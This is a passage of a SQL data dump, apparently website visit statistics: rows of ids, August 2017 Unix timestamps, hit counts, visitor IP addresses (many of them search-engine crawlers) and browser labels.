,'5.45.207.66','other'),(142893,1502189649,1,1,0,0,'136.243.73.76','other'),(142894,1502189791,1,1,0,0,'164.132.162.154','other'),(142895,1502189935,1,1,0,0,'95.108.181.78','other'),(142896,1502190328,1,1,0,0,'137.74.203.194','other'),(142897,1502190547,1,1,0,0,'51.255.65.82','other'),(142898,1502190709,1,1,0,0,'91.196.177.46','chrome'),(142899,1502190998,4,4,0,0,'91.209.11.236','other'),(142900,1502191433,3,3,0,0,'216.244.66.194','other'),(142901,1502191491,1,1,0,0,'91.196.178.72','firefox'),(142902,1502191582,1,1,0,0,'95.108.181.57','other'),(142903,1502191735,3,3,0,0,'216.244.66.246','other'),(142904,1502191759,1,1,0,0,'91.196.178.162','chrome'),(142905,1502191867,1,1,0,0,'188.255.23.130','msie'),(142906,1502191972,1,1,0,0,'194.44.41.133','chrome'),(142907,1502192114,1,0,1,0,'66.249.66.155',''),(142908,1502192291,1,1,0,0,'91.196.178.71','chrome'),(142909,1502192297,1,1,0,0,'66.249.66.157','chrome'),(142910,1502192437,1,1,0,0,'5.164.68.124','msie'),(142911,1502192575,1,1,0,0,'51.255.65.22','other'),(142912,1502192577,1,0,1,0,'66.249.66.75',''),(142913,1502192836,1,0,1,0,'66.249.66.74',''),(142914,1502192855,1,1,0,0,'51.255.71.119','other'),(142915,1502193626,1,1,0,0,'51.255.65.82','other'),(142916,1502193681,1,1,0,0,'51.255.65.8','other'),(142917,1502193889,4,4,0,0,'216.244.66.194','other'),(142918,1502194018,1,1,0,0,'213.180.203.32','other'),(142919,1502194020,1,1,0,0,'137.74.207.108','other'),(142920,1502194252,1,1,0,0,'66.249.66.155','chrome'),(142921,1502194291,2,2,0,0,'5.255.253.2','other'),(142922,1502194306,2,0,2,0,'66.249.66.75',''),(142923,1502194335,1,1,0,0,'91.196.178.69','chrome'),(142924,1502194462,1,1,0,0,'185.137.18.220','chrome'),(142925,1502194491,1,1,0,0,'137.74.203.194','other'),(142926,1502195020,1,1,0,0,'195.230.128.141','firefox'),(142927,1502195028,1,1,0,0,'95.108.181.58','other'),(142928,1502195263,1,1,0,0,'8.29.198.26','other'),(142929,1502196109,1,1,0,0,'5.45.207.66','other'),(142930,1502196189,1,1,0,0,'51.255.65.22','other'),(142931,1502196448,1,1,0,0,'51.255.65.91','other'),(142932,1502196515,1,1,0,0,'217.182.132.180','other'),(142933,1502196635,4,4,0,0,'216.244.66.246','other'),(142934,1502196864,1,1,0,0,'217.182.132.30','other'),(142935,1502196947,1,0,1,0,'66.249.66.157',''),(142936,1502197009,1,1,0,0,'91.196.178.71','chrome'),(142937,1502197097,1,1,0,0,'91.196.177.46','chrome'),(142938,1502197172,1,1,0,0,'95.108.181.60','other'),(142939,1502197373,1,1,0,0,'178.154.171.3','other'),(142940,1502197399,1,1,0,0,'51.255.65.11','other'),(142941,1502197440,1,1,0,0,'5.255.253.1','other'),(142942,1502197672,1,1,0,0,'193.194.108.1','chrome'),(142943,1502197917,1,1,0,0,'37.147.236.161','chrome'),(142944,1502198035,1,1,0,0,'217.182.132.24','other'),(142945,1502198063,1,1,0,0,'180.76.15.13','other'),(142946,1502198149,1,1,0,0,'91.196.178.69','chrome'),(142947,1502198336,1,1,0,0,'51.255.65.85','other'),(142948,1502198509,1,1,0,0,'37.9.113.128','other'),(142949,1502198766,1,1,0,0,'217.69.133.5','other'),(142950,1502198891,1,1,0,0,'46.201.175.91','firefox'),(142951,1502199336,1,1,0,0,'51.255.65.67','other'),(142952,1502199572,1,1,0,0,'188.32.176.228','msie'),(142953,1502199659,1,1,0,0,'66.249.66.75','chrome'),(142954,1502199744,1,1,0,0,'217.69.133.194','other'),(142955,1502199819,1,1,0,0,'217.182.132.61','other'),(142956,1502200068,1,1,0,0,'37.9.113.78','other'),(142957,1502200167,1,1,0,0,'217.182.132.56','other'),(142958,1502200365,1,1,0,0,'89.178.5.188','msie'),(142959,1502200537,1,1,0,0,'51.255.65.35','other'),(142960,1502200627,1,1,0,0,'137.74.207.120','other'),(142961,1502200630,5,5,0,0,'216.244.66.194','other'),(142962,1502200632,1,1,0,0,'213.180.203.43','other'),(142963,1502200636,1,1,0,0,'141.8.142.106','other'),(142964,1502200645,1,1,0,0,'5.45.207.57','other'),(142965,1502200649,1,1,0,0,'37.9.113.128','other'),(142966,1502200732,1,1,0,0,'213.180.203.14','other'),(142967,1502200785,1,1,0,0,'207.46.13.109','other'),(142968,1502200941,1,1,0,0,'95.220.35.47','msie'),(142969,1502201058,1,1,0,0,'51.255.65.54','other'),(142970,1502201137,1,0,1,0,'66.249.66.75',''),(142971,1502201249,2,0,2,0,'66.249.66.156',''),(142972,1502201294,1,1,0,0,'195.230.119.34','chrome'),(142973,1502201560,1,1,0,0,'109.63.215.48','msie'),(142974,1502201682,1,1,0,0,'5.45.207.56','other'),(142975,1502202235,1,1,0,0,'217.182.132.75','other'),(142976,1502202708,1,1,0,0,'95.108.181.92','other'),(142977,1502202750,2,2,0,0,'216.244.66.246','other'),(142978,1502202896,1,1,0,0,'180.76.15.22','other'),(142979,1502203164,1,1,0,0,'66.249.66.157','chrome'),(142980,1502203340,1,1,0,0,'178.154.200.36','other'),(142981,1502203801,1,1,0,0,'91.196.178.67','chrome'),(142982,1502204721,1,1,0,0,'95.108.181.52','other'),(142983,1502204725,1,1,0,0,'5.45.207.83','other'),(142984,1502204737,1,1,0,0,'95.108.181.58','other'),(142985,1502204745,1,1,0,0,'178.154.200.36','other'),(142986,1502204842,1,1,0,0,'51.255.65.92','other'),(142987,1502205023,1,0,1,0,'66.249.66.156',''),(142988,1502205111,1,1,0,0,'217.182.132.192','other'),(142989,1502205450,1,1,0,0,'217.69.133.194','other'),(142990,1502205455,1,1,0,0,'217.69.133.203','other'),(142991,1502205471,4,4,0,0,'216.244.66.194','other'),(142992,1502205708,1,1,0,0,'157.55.39.153','other'),(142993,1502206112,1,1,0,0,'8.29.198.25','other'),(142994,1502206140,1,1,0,0,'217.182.132.87','other'),(142995,1502206280,1,1,0,0,'51.255.71.121','other'),(142996,1502206658,5,5,0,0,'216.244.66.246','other'),(142997,1502207375,1,1,0,0,'217.182.132.71','other'),(142998,1502207977,1,1,0,0,'51.255.65.16','other'),(142999,1502207979,1,1,0,0,'176.15.176.66','msie'),(143000,1502208500,1,1,0,0,'51.255.65.73','other'),(143001,1502209021,1,1,0,0,'89.178.5.188','msie'),(143002,1502209042,1,1,0,0,'51.255.65.56','other'),(143003,1502209131,1,1,0,0,'51.255.71.122','other'),(143004,1502209155,1,0,1,0,'66.249.66.158',''),(143005,1502209202,1,1,0,0,'157.55.39.205','other'),(143006,1502209352,1,1,0,0,'141.8.142.20','other'),(143007,1502209518,1,1,0,0,'37.9.113.94','other'),(143008,1502209579,1,0,1,0,'66.249.66.199',''),(143009,1502210106,1,1,0,0,'46.188.81.53','msie'),(143010,1502210227,1,1,0,0,'5.228.112.217','msie'),(143011,1502210517,1,1,0,0,'37.115.196.168','firefox'),(143012,1502210632,1,1,0,0,'5.45.207.57','other'),(143013,1502210723,1,1,0,0,'217.182.132.148','other'),(143014,1502210765,1,1,0,0,'217.182.132.240','other'),(143015,1502211130,1,1,0,0,'217.69.133.4','other'),(143016,1502211281,1,1,0,0,'141.8.142.20','other'),(143017,1502211742,1,1,0,0,'157.55.39.153','other'),(143018,1502211824,1,1,0,0,'91.209.11.236','other'),(143019,1502211922,1,0,1,0,'66.249.66.157',''),(143020,1502211941,1,1,0,0,'217.182.132.4','other'),(143021,1502212000,1,1,0,0,'157.55.39.205','other'),(143022,1502212224,1,1,0,0,'217.69.133.6','other'),(143023,1502212228,1,1,0,0,'217.69.133.2','other'),(143024,1502212229,1,1,0,0,'217.69.133.194','other'),(143025,1502212267,1,1,0,0,'51.255.65.50','other'),(143026,1502212960,1,1,0,0,'217.182.132.180','other'),(143027,1502213161,1,1,0,0,'37.9.113.163','other'),(143028,1502213167,1,1,0,0,'51.255.65.52','other'),(143029,1502213186,1,1,0,0,'95.108.181.69','other'),(143030,1502213244,3,3,0,0,'141.8.142.44','other'),(143031,1502213260,6,6,0,0,'216.244.66.246','other'),(143032,1502213361,1,1,0,0,'51.255.65.90','other'),(143033,1502213380,1,1,0,0,'95.108.181.63','other'),(143034,1502213704,1,0,1,0,'66.249.66.158',''),(143035,1502213771,1,1,0,0,'91.209.11.236','other'),(143036,1502213838,1,1,0,0,'141.8.142.42','other'),(143037,1502214108,1,1,0,0,'95.108.181.69','other'),(143038,1502214275,1,0,1,0,'68.180.229.59',''),(143039,1502214477,1,1,0,0,'51.255.65.57','other'),(143040,1502214484,1,1,0,0,'5.45.207.64','other'),(143041,1502214942,1,1,0,0,'91.209.11.236','other'),(143042,1502215081,4,4,0,0,'216.244.66.194','other'),(143043,1502215284,2,0,2,0,'66.249.66.201',''),(143044,1502215754,1,1,0,0,'176.15.176.66','msie'),(143045,1502215856,1,1,0,0,'51.255.65.11','other'),(143046,1502216203,1,1,0,0,'77.41.114.205','msie'),(143047,1502216434,1,1,0,0,'91.196.178.162','chrome'),(143048,1502216702,1,1,0,0,'207.46.13.109','other'),(143049,1502216949,1,1,0,0,'8.29.198.26','other'),(143050,1502217057,1,1,0,0,'51.255.71.121','other'),(143051,1502217296,1,1,0,0,'176.193.231.146','msie'),(143052,1502217468,4,4,0,0,'216.244.66.246','other'),(143053,1502217952,1,1,0,0,'141.8.142.20','other'),(143054,1502217973,1,1,0,0,'95.220.35.47','msie'),(143055,1502218317,1,1,0,0,'213.180.203.32','other'),(143056,1502218397,1,1,0,0,'217.182.132.70','other'),(143057,1502218696,1,1,0,0,'217.182.132.55','other'),(143058,1502218974,1,0,1,0,'66.249.66.201',''),(143059,1502219035,1,1,0,0,'217.182.132.24','other'),(143060,1502219099,1,1,0,0,'66.249.66.201','chrome'),(143061,1502219464,1,1,0,0,'51.255.71.121','other'),(143062,1502219515,1,1,0,0,'37.9.113.94','other'),(143063,1502219518,1,1,0,0,'217.182.132.182','other'),(143064,1502219665,1,1,0,0,'141.8.142.44','other'),(143065,1502220035,1,1,0,0,'37.9.113.163','other'),(143066,1502220422,1,0,1,0,'66.249.66.195',''),(143067,1502220813,1,1,0,0,'141.8.142.20','other'),(143068,1502221039,1,1,0,0,'216.244.66.246','other'),(143069,1502221104,1,1,0,0,'51.255.65.61','other'),(143070,1502221131,1,1,0,0,'180.76.15.34','other'),(143071,1502221312,1,0,1,0,'66.249.66.75',''),(143072,1502221392,2,2,0,0,'141.8.142.44','other'),(143073,1502221472,1,1,0,0,'95.108.181.69','other'),(143074,1502221503,1,1,0,0,'217.69.133.9','other'),(143075,1502221563,1,1,0,0,'51.255.65.58','other'),(143076,1502222015,1,1,0,0,'213.180.203.32','other'),(143077,1502222223,2,2,0,0,'79.143.180.19','other'),(143078,1502222269,1,1,0,0,'51.255.65.42','other'),(143079,1502222336,1,1,0,0,'37.9.113.163','other'),(143080,1502222630,1,1,0,0,'216.244.66.246','other'),(143081,1502222679,2,2,0,0,'95.108.181.63','other'),(143082,1502222860,1,1,0,0,'141.8.142.106','other'),(143083,1502222949,1,1,0,0,'217.182.132.65','other'),(143084,1502222991,1,1,0,0,'37.9.113.94','other'),(143085,1502223011,1,1,0,0,'91.209.11.236','other'),(143086,1502223041,1,1,0,0,'213.180.203.32','other'),(143087,1502223086,1,0,1,0,'66.249.66.157',''),(143088,1502223285,1,1,0,0,'137.74.207.120','other'),(143089,1502223881,1,1,0,0,'141.8.142.20','other'),(143090,1502223927,1,1,0,0,'5.189.133.120','other'),(143091,1502224051,2,2,0,0,'91.209.11.236','other'),(143092,1502224073,1,1,0,0,'217.182.132.191','other'),(143093,1502224560,1,1,0,0,'157.55.39.153','other'),(143094,1502224745,1,0,1,0,'66.249.66.157',''),(143095,1502224946,1,0,1,0,'66.249.66.156',''),(143096,1502225220,1,1,0,0,'216.244.66.246','other'),(143097,1502225422,1,0,1,0,'66.249.66.76',''),(143098,1502225427,1,1,0,0,'180.76.15.20','other'),(143099,1502225846,1,1,0,0,'5.45.207.64','other'),(143100,1502226069,1,1,0,0,'207.46.13.109','other'),(143101,1502226203,1,1,0,0,'95.108.181.69','other'),(143102,1502226311,1,1,0,0,'217.182.132.193','other'),(143103,1502226556,1,1,0,0,'141.8.142.106','other'),(143104,1502226561,2,0,2,0,'66.249.66.75',''),(143105,1502226759,4,4,0,0,'46.229.168.73','other'),(143106,1502226777,3,3,0,0,'46.229.168.74','other'),(143107,1502226796,2,2,0,0,'46.229.168.79','other'),(143108,1502226815,3,3,0,0,'46.229.168.65','other'),(143109,1502226824,1,1,0,0,'5.45.207.64','other'),(143110,1502226833,5,5,0,0,'46.229.168.75','other'),(143111,1502226853,1,1,0,0,'51.255.65.224','other'),(143112,1502226861,2,1,1,0,'66.249.66.74',''),(143113,1502226876,1,1,0,0,'37.55.224.166','chrome'),(143114,1502226886,1,1,0,0,'46.229.168.78','other'),(143115,1502226889,6,6,0,0,'46.229.168.76','other'),(143116,1502226907,4,4,0,0,'46.229.168.71','other'),(143117,1502226934,4,4,0,0,'46.229.168.77','other'),(143118,1502226979,4,4,0,0,'46.229.168.80','other'),(143119,1502227032,6,6,0,0,'46.229.168.70','other'),(143120,1502227088,10,10,0,0,'46.229.168.72','other'),(143121,1502227152,1,1,0,0,'5.255.253.4','other'),(143122,1502227215,2,2,0,0,'46.229.168.67','other'),(143123,1502227286,14,14,0,0,'46.229.168.66','other'),(143124,1502227323,1,1,0,0,'213.180.203.32','other'),(143125,1502227432,3,3,0,0,'46.229.168.68','other'),(143126,1502227783,1,1,0,0,'8.29.198.27','other'),(143127,1502227818,6,6,0,0,'46.229.168.75','other'),(143128,1502227823,1,1,0,0,'157.55.39.153','other'),(143129,1502227836,3,3,0,0,'46.229.168.73','other'),(143130,1502227863,5,5,0,0,'46.229.168.78','other'),(143131,1502227885,1,1,0,0,'91.209.11.236','other'),(143132,1502227927,4,4,0,0,'46.229.168.65','other'),(143133,1502228000,3,3,0,0,'46.229.168.79','other'),(143134,1502228040,1,1,0,0,'51.255.65.38','other'),(143135,1502228055,1,1,0,0,'46.229.168.70','other'),(143136,1502228073,2,2,0,0,'46.229.168.71','other'),(143137,1502228101,4,4,0,0,'46.229.168.76','other'),(143138,1502228115,3,3,0,0,'46.229.168.77','other'),(143139,1502228230,1,1,0,0,'217.69.133.6','other'),(143140,1502228231,4,4,0,0,'46.229.168.74','other'),(143141,1502228236,3,3,0,0,'46.229.168.80','other'),(143142,1502228321,1,1,0,0,'217.182.132.20','other'),(143143,1502228327,2,2,0,0,'46.229.168.72','other'),(143144,1502228328,1,1,0,0,'137.74.207.101','other'),(143145,1502228424,1,1,0,0,'216.244.66.246','other'),(143146,1502228490,1,1,0,0,'46.229.168.68','other'),(143147,1502228586,1,1,0,0,'46.229.168.66','other'),(143148,1502229352,1,1,0,0,'217.182.132.147','other'),(143149,1502229408,1,1,0,0,'217.182.132.59','other'),(143150,1502229449,2,2,0,0,'91.209.11.236','other'),(143151,1502229531,1,1,0,0,'51.255.65.5','other'),(143152,1502229566,1,0,1,0,'66.249.66.75',''),(143153,1502229776,1,1,0,0,'37.9.113.94','other'),(143154,1502229819,1,1,0,0,'217.182.132.70','other'),(143155,1502229902,1,1,0,0,'180.76.15.17','other'),(143156,1502230775,1,1,0,0,'95.108.181.69','other'),(143157,1502230778,1,1,0,0,'141.8.142.55','other'),(143158,1502230969,1,0,1,0,'66.249.66.75',''),(143159,1502230995,1,1,0,0,'217.182.132.59','other'),(143160,1502231091,1,1,0,0,'217.182.132.25','other'),(143161,1502231102,1,0,1,0,'66.249.66.76',''),(143162,1502231212,1,1,0,0,'217.182.132.95','other'),(143163,1502231350,1,1,0,0,'217.182.132.67','other'),(143164,1502231878,1,1,0,0,'51.255.65.60','other'),(143165,1502232081,1,1,0,0,'51.255.65.33','other'),(143166,1502232117,1,1,0,0,'51.255.71.122','other'),(143167,1502232132,1,1,0,0,'217.182.132.148','other'),(143168,1502232275,6,6,0,0,'216.244.66.194','other'),(143169,1502232834,1,0,1,0,'66.249.66.76',''),(143170,1502232879,1,1,0,0,'217.69.133.194','other'),(143171,1502232902,1,1,0,0,'51.255.65.88','other'),(143172,1502233088,1,1,0,0,'141.8.142.55','other'),(143173,1502233175,1,1,0,0,'66.249.66.76','chrome'),(143174,1502233350,1,1,0,0,'207.46.13.99','other'),(143175,1502233453,1,1,0,0,'141.8.142.106','other'),(143176,1502233461,1,1,0,0,'51.255.65.65','other'),(143177,1502233997,2,2,0,0,'216.244.66.246','other'),(143178,1502234117,1,1,0,0,'217.182.132.57','other'),(143179,1502234169,1,1,0,0,'37.9.113.94','other'),(143180,1502234296,1,1,0,0,'51.255.71.130','other'),(143181,1502234570,1,1,0,0,'66.249.66.157','chrome'),(143182,1502235358,1,1,0,0,'216.244.66.246','other'),(143183,1502235582,1,1,0,0,'164.132.162.157','other'),(143184,1502235701,2,2,0,0,'216.244.66.194','other'),(143185,1502236741,1,1,0,0,'217.182.132.83','other'),(143186,1502238287,1,1,0,0,'217.182.132.27','other'),(143187,1502238336,3,3,0,0,'216.244.66.246','other'),(143188,1502238438,2,0,2,0,'66.249.66.74',''),(143189,1502238460,1,0,1,0,'66.249.66.157',''),(143190,1502238463,1,0,1,0,'66.249.66.155',''),(143191,1502238627,1,1,0,0,'8.29.198.27','other'),(143192,1502238845,1,1,0,0,'51.255.65.62','other'),(143193,1502238867,1,1,0,0,'217.182.132.21','other'),(143194,1502239115,1,1,0,0,'151.80.27.116','other'),(143195,1502239139,1,1,0,0,'164.132.162.188','other'),(143196,1502239699,1,1,0,0,'164.132.162.155','other'),(143197,1502239834,1,1,0,0,'141.8.142.55','other'),(143198,1502240353,1,0,1,0,'66.249.66.155',''),(143199,1502240394,5,5,0,0,'216.244.66.194','other'),(143200,1502240447,1,1,0,0,'217.182.132.175','other'),(143201,1502240518,1,1,0,0,'173.208.173.138','other'),(143202,1502240526,1,1,0,0,'91.209.11.236','other'),(143203,1502240790,1,1,0,0,'51.255.65.25','other'),(143204,1502240959,1,1,0,0,'217.182.132.80','other'),(143205,1502241061,1,1,0,0,'157.55.39.197','other'),(143206,1502241120,1,1,0,0,'66.249.66.156','chrome'),(143207,1502241323,1,1,0,0,'5.45.207.64','other'),(143208,1502241525,1,1,0,0,'151.80.27.118','other'),(143209,1502241529,1,1,0,0,'66.249.66.155','chrome'),(143210,1502241674,1,1,0,0,'66.249.66.74','chrome'),(143211,1502241942,1,1,0,0,'141.8.142.106','other'),(143212,1502242132,1,1,0,0,'217.182.132.30','other'),(143213,1502242169,2,2,0,0,'91.209.11.236','other'),(143214,1502242297,1,1,0,0,'66.249.66.156','chrome'),(143215,1502242955,1,0,1,0,'66.249.66.75',''),(143216,1502242965,1,0,1,0,'66.249.66.155',''),(143217,1502243853,1,1,0,0,'51.255.65.22','other'),(143218,1502244061,1,1,0,0,'217.182.132.23','other'),(143219,1502244132,1,1,0,0,'141.8.142.20','other'),(143220,1502244561,1,0,1,0,'66.249.66.156',''),(143221,1502244671,1,1,0,0,'217.182.132.178','other'),(143222,1502244778,1,1,0,0,'157.55.39.205','other'),(143223,1502244875,1,1,0,0,'95.108.181.69','other'),(143224,1502244889,1,1,0,0,'217.182.132.18','other'),(143225,1502244902,1,1,0,0,'164.132.162.188','other'),(143226,1502245030,4,4,0,0,'216.244.66.246','other'),(143227,1502245220,1,1,0,0,'217.182.132.153','other'),(143228,1502245426,1,1,0,0,'51.255.65.37','other'),(143229,1502245587,1,0,1,0,'66.249.66.156',''),(143230,1502245707,2,2,0,0,'37.9.113.94','other'),(143231,1502245918,5,5,0,0,'216.244.66.194','other'),(143232,1502246097,1,1,0,0,'157.55.39.205','other'),(143233,1502246169,1,1,0,0,'37.9.113.163','other'),(143234,1502246274,1,1,0,0,'217.69.133.9','other'),(143235,1502246735,1,1,0,0,'217.182.132.57','other'),(143236,1502246925,1,1,0,0,'164.132.162.155','other'),(143237,1502247827,1,1,0,0,'141.8.142.55','other'),(143238,1502247837,1,1,0,0,'42.237.235.6','other'),(143239,1502248344,1,0,1,0,'66.249.66.75',''),(143240,1502248525,1,1,0,0,'141.8.142.106','other'),(143241,1502249309,1,1,0,0,'178.154.200.7','other'),(143242,1502249461,1,1,0,0,'8.29.198.25','other'),(143243,1502249494,1,1,0,0,'91.209.11.236','other'),(143244,1502249518,4,4,0,0,'216.244.66.194','other'),(143245,1502249902,1,1,0,0,'217.69.133.9','other'),(143246,1502250020,1,1,0,0,'95.108.181.69','other'),(143247,1502250307,1,0,1,0,'66.249.66.75',''),(143248,1502250343,1,1,0,0,'95.108.181.63','other'),(143249,1502250438,1,0,1,0,'66.249.66.157',''),(143250,1502250512,3,3,0,0,'216.244.66.246','other'),(143251,1502251266,1,1,0,0,'141.8.142.20','other'),(143252,1502251771,1,1,0,0,'180.76.15.162','other'),(143253,1502252170,1,1,0,0,'109.63.201.45','msie'),(143254,1502252264,2,0,2,0,'66.249.66.76',''),(143255,1502252626,2,2,0,0,'95.108.181.58','other'),(143256,1502252637,1,1,0,0,'141.8.142.20','other'),(143257,1502252746,1,1,0,0,'91.196.178.66','firefox'),(143258,1502253588,2,2,0,0,'91.209.11.236','other'),(143259,1502253880,1,0,1,0,'66.249.66.74',''),(143260,1502254701,1,1,0,0,'157.55.39.197','other'),(143261,1502254892,1,1,0,0,'141.8.142.42','other'),(143262,1502255382,1,1,0,0,'91.196.178.69','chrome'),(143263,1502255608,4,4,0,0,'216.244.66.246','other'),(143264,1502256094,1,1,0,0,'91.209.11.236','other'),(143265,1502256600,1,1,0,0,'157.55.39.153','other'),(143266,1502257394,1,1,0,0,'91.196.178.39','chrome'),(143267,1502257500,1,0,1,0,'66.249.66.157',''),(143268,1502257687,1,1,0,0,'217.69.133.203','other'),(143269,1502257855,1,1,0,0,'216.244.66.246','other'),(143270,1502257984,1,1,0,0,'91.196.178.69','chrome'),(143271,1502257985,5,5,0,0,'216.244.66.194','other'),(143272,1502258074,1,1,0,0,'37.9.113.163','other'),(143273,1502258203,1,1,0,0,'91.196.178.68','chrome'),(143274,1502258287,2,2,0,0,'66.102.9.29','chrome'),(143275,1502259090,1,0,1,0,'66.249.66.74',''),(143276,1502259199,1,1,0,0,'37.9.113.163','other'),(143277,1502259207,1,0,1,0,'66.249.66.76',''),(143278,1502259221,1,0,1,0,'66.249.66.75',''),(143279,1502259755,1,1,0,0,'46.219.6.41','chrome'),(143280,1502259819,2,2,0,0,'91.209.11.236','other'),(143281,1502259877,2,2,0,0,'91.196.178.71','chrome'),(143282,1502260005,4,4,0,0,'216.244.66.194','other'),(143283,1502260277,1,1,0,0,'91.196.178.68','chrome'),(143284,1502260300,1,1,0,0,'8.29.198.25','other'),(143285,1502260423,1,1,0,0,'91.196.178.68','firefox'),(143286,1502260856,3,3,0,0,'213.136.73.195','other'),(143287,1502261249,5,5,0,0,'216.244.66.246','other'),(143288,1502261368,1,1,0,0,'37.52.22.10','firefox'),(143289,1502261382,1,1,0,0,'91.209.11.236','other'),(143290,1502261447,1,0,1,0,'66.249.66.74',''),(143291,1502261538,1,1,0,0,'157.55.39.197','other'),(143292,1502261844,1,1,0,0,'95.108.181.58','other'),(143293,1502262529,1,1,0,0,'37.9.113.163','other'),(143294,1502262804,1,1,0,0,'35.184.189.105','other'),(143295,1502262990,1,1,0,0,'46.219.33.141','chrome'),(143296,1502263028,1,1,0,0,'109.227.113.77','chrome'),(143297,1502263320,1,1,0,0,'91.209.11.236','other'),(143298,1502263365,1,1,0,0,'217.69.133.5','other'),(143299,1502263387,1,1,0,0,'46.201.175.91','firefox'),(143300,1502263391,1,1,0,0,'141.8.142.106','other'),(143301,1502263586,4,4,0,0,'216.244.66.246','other'),(143302,1502263654,1,1,0,0,'5.45.207.64','other'),(143303,1502263658,1,1,0,0,'141.8.142.20','other'),(143304,1502263729,1,1,0,0,'213.160.158.129','firefox'),(143305,1502263897,1,1,0,0,'185.30.202.116','firefox'),(143306,1502263926,1,1,0,0,'91.196.178.69','chrome'),(143307,1502264093,1,1,0,0,'91.196.178.161','chrome'),(143308,1502264419,1,1,0,0,'193.93.184.171','chrome'),(143309,1502265012,1,1,0,0,'51.255.71.116','other'),(143310,1502265157,1,1,0,0,'91.196.178.69','chrome'),(143311,1502265410,1,0,1,0,'66.249.66.155',''),(143312,1502265434,1,1,0,0,'193.93.184.171','chrome'),(143313,1502265708,1,1,0,0,'217.182.132.183','other'),(143314,1502265837,1,1,0,0,'157.55.39.153','other'),(143315,1502266197,1,1,0,0,'51.255.65.93','other'),(143316,1502266381,1,1,0,0,'91.209.11.236','other'),(143317,1502266487,1,1,0,0,'91.196.178.69','chrome'),(143318,1502266704,1,1,0,0,'217.182.132.93','other'),(143319,1502266863,1,1,0,0,'216.244.66.194','other'),(143320,1502267254,1,0,1,0,'66.249.66.76',''),(143321,1502267314,1,1,0,0,'164.132.162.159','other'),(143322,1502267317,1,0,1,0,'66.249.66.74',''),(143323,1502267570,1,1,0,0,'51.255.65.35','other'),(143324,1502267893,1,1,0,0,'141.8.142.106','other'),(143325,1502267924,1,1,0,0,'46.201.175.91','firefox'),(143326,1502267967,1,1,0,0,'46.219.33.141','chrome'),(143327,1502268022,1,1,0,0,'91.196.178.162','chrome'),(143328,1502268374,2,2,0,0,'91.209.11.236','other'),(143329,1502268394,2,2,0,0,'51.255.65.73','other'),(143330,1502268610,1,1,0,0,'213.180.203.32','other'),(143331,1502268778,1,1,0,0,'95.108.181.58','other'),(143332,1502268827,1,1,0,0,'91.196.178.69','chrome'),(143333,1502269226,1,1,0,0,'217.182.132.34','other'),(143334,1502269244,1,1,0,0,'217.69.133.2','other'),(143335,1502269390,1,0,1,0,'66.249.66.155',''),(143336,1502269575,1,1,0,0,'51.255.65.4','other'),(143337,1502269638,1,1,0,0,'51.255.65.72','other'),(143338,1502269847,1,1,0,0,'51.255.65.31','other'),(143339,1502269941,1,1,0,0,'91.209.11.236','other'),(143340,1502270008,1,1,0,0,'91.196.178.68','firefox'),(143341,1502270062,1,1,0,0,'5.45.207.64','other'),(143342,1502270736,1,1,0,0,'91.196.178.161','chrome'),(143343,1502270824,1,1,0,0,'95.108.181.58','other'),(143344,1502270892,1,1,0,0,'95.108.181.63','other'),(143345,1502271132,1,1,0,0,'51.255.65.18','other'),(143346,1502271141,1,1,0,0,'8.29.198.25','other'),(143347,1502271186,4,4,0,0,'216.244.66.246','other'),(143348,1502271198,1,1,0,0,'141.8.142.55','other'),(143349,1502271222,1,1,0,0,'217.182.132.180','other'),(143350,1502271517,1,1,0,0,'51.255.65.97','other'),(143351,1502271525,1,1,0,0,'217.182.132.148','other'),(143352,1502271661,1,0,1,0,'66.249.66.157',''),(143353,1502271701,1,1,0,0,'217.182.132.17','other'),(143354,1502272134,1,1,0,0,'217.182.132.192','other'),(143355,1502272343,4,4,0,0,'216.244.66.194','other'),(143356,1502272423,1,1,0,0,'46.201.175.91','firefox'),(143357,1502272637,2,0,2,0,'66.249.66.155',''),(143358,1502272644,1,1,0,0,'217.182.132.27','other'),(143359,1502272649,1,1,0,0,'217.69.133.5','other'),(143360,1502272766,1,1,0,0,'91.196.178.69','chrome'),(143361,1502272768,2,0,2,0,'66.249.66.157',''),(143362,1502272775,2,0,2,0,'66.249.66.156',''),(143363,1502272852,1,1,0,0,'37.9.113.163','other'),(143364,1502272959,1,1,0,0,'162.210.196.129','other'),(143365,1502273016,1,1,0,0,'93.104.215.169','other'),(143366,1502273098,1,1,0,0,'95.134.43.121','chrome'),(143367,1502273131,1,1,0,0,'95.132.54.100','chrome'),(143368,1502273548,1,1,0,0,'93.74.212.147','firefox'),(143369,1502273588,1,1,0,0,'37.9.113.94','other'),(143370,1502273647,1,0,1,0,'66.249.66.155',''),(143371,1502273715,1,1,0,0,'217.69.133.194','other'),(143372,1502273717,1,1,0,0,'217.69.133.203','other'),(143373,1502273858,1,1,0,0,'164.132.162.153','other'),(143374,1502274338,2,0,2,0,'66.249.66.76',''),(143375,1502274374,1,1,0,0,'95.108.181.60','other'),(143376,1502274421,1,1,0,0,'91.196.178.66','chrome'),(143377,1502274751,1,1,0,0,'217.182.132.84','other'),(143378,1502274855,1,1,0,0,'91.196.178.131','firefox'),(143379,1502275339,1,1,0,0,'91.196.178.68','firefox'),(143380,1502275357,3,3,0,0,'216.244.66.246','other'),(143381,1502275645,1,1,0,0,'178.95.158.219','chrome'),(143382,1502275924,1,1,0,0,'5.255.253.4','other'),(143383,1502275939,1,1,0,0,'51.255.65.51','other'),(143384,1502275986,2,2,0,0,'37.9.113.195','other'),(143385,1502275989,1,1,0,0,'178.154.200.7','other'),(143386,1502275993,2,2,0,0,'141.8.142.107','other'),(143387,1502275996,2,2,0,0,'95.108.181.58','other'),(143388,1502276648,1,1,0,0,'141.8.142.45','other'),(143389,1502276944,1,1,0,0,'212.113.43.122','chrome'),(143390,1502277578,1,1,0,0,'91.209.11.236','other'),(143391,1502277690,1,1,0,0,'91.196.178.69','chrome'),(143392,1502277698,1,1,0,0,'217.182.132.94','other'),(143393,1502277908,1,1,0,0,'95.108.181.69','other'),(143394,1502278026,1,1,0,0,'178.154.200.7','other'),(143395,1502278229,1,1,0,0,'137.74.207.114','other'),(143396,1502278410,1,1,0,0,'91.196.178.162','chrome'),(143397,1502278457,1,0,1,0,'66.249.66.157',''),(143398,1502278525,1,1,0,0,'66.249.66.155','chrome'),(143399,1502278612,1,1,0,0,'216.244.66.237','other'),(143400,1502279029,1,1,0,0,'46.201.175.91','firefox'),(143401,1502279080,1,1,0,0,'207.46.13.99','other'),(143402,1502279328,1,1,0,0,'217.182.132.147','other'),(143403,1502279576,1,1,0,0,'51.255.65.38','other'),(143404,1502279591,1,1,0,0,'5.45.207.64','other'),(143405,1502279595,1,1,0,0,'37.9.113.94','other'),(143406,1502279